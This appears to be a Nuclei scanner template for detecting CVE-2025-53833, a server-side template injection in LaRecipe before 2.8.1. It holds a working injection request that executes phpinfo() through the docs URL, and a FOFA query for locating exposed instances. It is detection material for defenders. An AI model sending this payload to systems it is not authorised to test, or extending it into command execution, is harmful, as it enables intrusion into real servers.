info: name: LaRecipe <2.8.1 Remote Code Execution via SSTI author: iamnoooob,pdresearch severity: critical description: | LaRecipe is an application that allows users to create documentation with Markdown inside a Laravel app. Versions prior to 2.8.1 are vulnerable to Server-Side Template Injection (SSTI), which could potentially lead to Remote Code Execution (RCE) in vulnerable configurations. Attackers could execute arbitrary commands on the server, access sensitive environment variables, and/or escalate access depending on server configuration. remediation: Users are strongly advised to upgrade to version v2.8.1or later to receive a patch. reference: - https://github.com/saleem-hadad/larecipe/security/advisories/GHSA-jv7x-xhv2-p5v2 - https://github.com/advisories/GHSA-jv7x-xhv2-p5v2 - https://nvd.nist.gov/vuln/detail/CVE-2025-53833 metadata: verified:true max-request:1 fofa-query: body="/binarytorch/larecipe/" tags: cve,cve2025,larecipe,rce,ssti,oss
http: -raw: - | GET /docs/1.0/?{{phpinfo()}} HTTP/1.1 Host: {{Hostname}}
skip-variables-check:true
matchers-condition: and matchers: -type: word part: body words: -"PHP Extension" -"PHP Version" condition: and